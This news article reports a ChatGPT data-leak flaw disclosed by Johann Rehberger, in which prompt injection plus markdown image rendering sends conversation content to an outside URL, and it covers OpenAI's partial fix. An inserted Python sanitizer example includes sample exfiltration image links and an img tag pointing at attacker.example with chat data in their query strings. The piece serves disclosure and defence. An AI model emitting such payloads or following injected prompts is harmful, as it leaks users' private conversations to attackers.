Serious Flaw in ChatGPT Allows Chatbots to Leak Conversations


OpenAI says it has fixed a potentially serious ChatGPT flaw – but there could still be problems

A flaw in OpenAI’s popular language model, ChatGPT, has been discovered, potentially compromising users’ sensitive information. The flaw allowed details from conversations to be leaked to an external URL, raising concerns about data security and privacy. When a researcher, Johann Rehberger, tried to alert OpenAI about the flaw, he received no response. Faced with the lack of a resolution, Rehberger publicly disclosed the details of the flaw.

The identified vulnerability could enable malicious chatbots powered by ChatGPT to exfiltrate not only the content of the chat but also metadata and technical data. The flaw could be exploited through various methods, including a tactic where the victim submits a prompt provided by the attacker. By combining prompt injection with image markdown rendering, the attacker can extract the data.

Rehberger first reported the flaw to OpenAI in April 2023, and despite providing additional information on the potential risks in November, his efforts were met with silence. Feeling ignored by OpenAI, Rehberger opted to share his findings with the public to raise awareness and hold the company accountable. In a video demonstration, he showcased how a full conversation with a chatbot, designed to play tic-tac-toe, was extracted to a third-party URL.

OpenAI responded to the disclosure by implementing safety checks to mitigate the flaw. However, these measures do not fully address the issue. Rehberger discovered that arbitrary domains can still be rendered by ChatGPT, so the flaw remains viable. Although the new checks have been implemented on desktop versions, they do not cover the iOS mobile app, leaving users on that platform vulnerable.


Rehberger acknowledged the progress made by OpenAI but pointed out the remaining gaps. He noted that ChatGPT now performs validation API calls when a server returns an image tag with a hyperlink. However, he found that some arbitrary domains can still bypass the checks, leading to a hit-or-miss situation.
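For teams building their own chat front ends, the class of check described above can be applied to model output before it is rendered. The following is an added illustration, not OpenAI's implementation (whose details the article does not give); the allowlisted host, the function names and the sample response are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host this deployment is willing to load images from.
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}
PLACEHOLDER = "{image removed}"

MD_IMAGE = re.compile(r'!\[[^\]]*\]\(\s*<?([^)\s>]+)[^)]*\)')  # ![alt](url "title")
REF_DEF = re.compile(r'^ {0,3}\[[^\]]+\]:\s*<?([^\s>]+)>?.*$', re.M)  # [id]: url
HTML_IMAGE = re.compile(r'<img\b[^>]*>', re.I)  # raw HTML image tag

# Constructed model response: one legitimate image and four exfiltration attempts.
SAMPLE = (
    "Your move!\n"
    "![logo](https://cdn.example.com/logo.png)\n"
    "![board](https://attacker.example/log?chat=X%20took%20center)\n"
    "![t](https://cdn.example.com@attacker.example/p.png)\n"
    '<img src="https://attacker.example/p.gif?d=secret">\n'
    "![ref][leak]\n"
    "[leak]: https://attacker.example/r.png?d=abc\n"
)

def image_url_allowed(url):
    """True only for https URLs whose exact host is on the allowlist."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:  # malformed authority, e.g. a broken IPv6 literal
        return False
    return parts.scheme == "https" and (parts.hostname or "") in ALLOWED_IMAGE_HOSTS

def sanitize_model_output(text):
    """Return (safe_text, blocked) where blocked lists what was stripped."""
    blocked = []

    def check_url(match):
        if image_url_allowed(match.group(1)):
            return match.group(0)
        blocked.append(match.group(1))
        return PLACEHOLDER

    def drop_tag(match):  # raw <img> is dropped outright; markdown is the only image path
        blocked.append(match.group(0))
        return PLACEHOLDER

    text = HTML_IMAGE.sub(drop_tag, text)
    # Conservative: any reference definition to an unlisted host is dropped,
    # because it may back a reference-style image such as ![ref][leak].
    text = REF_DEF.sub(check_url, text)
    text = MD_IMAGE.sub(check_url, text)
    return text, blocked
```

The `blocked` list is worth logging: an image URL to an unlisted host that carries a long query string is a useful signal that a prompt injection was attempted.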

As ChatGPT is widely used for various purposes, such as customer support and content generation, the security flaw raises concerns about the privacy of user data. With the potential for sensitive information to be compromised, individuals and businesses using ChatGPT should exercise caution when discussing confidential matters through the platform.

OpenAI has not released a statement addressing the flaw or the partial mitigation implemented. Users are advised to remain vigilant while the company works on a complete fix. As the incident demonstrates, responsible disclosure and prompt remediation are crucial in ensuring the security of AI-powered systems. Users must continually evaluate the risks associated with using such technologies and stay informed about potential vulnerabilities that may arise.

In the age of advanced AI, ensuring the privacy and security of user data is paramount. While OpenAI claims to have fixed a potentially serious flaw in ChatGPT, the lingering gaps highlight the need for continuous improvement and vigilance in the face of evolving threats.
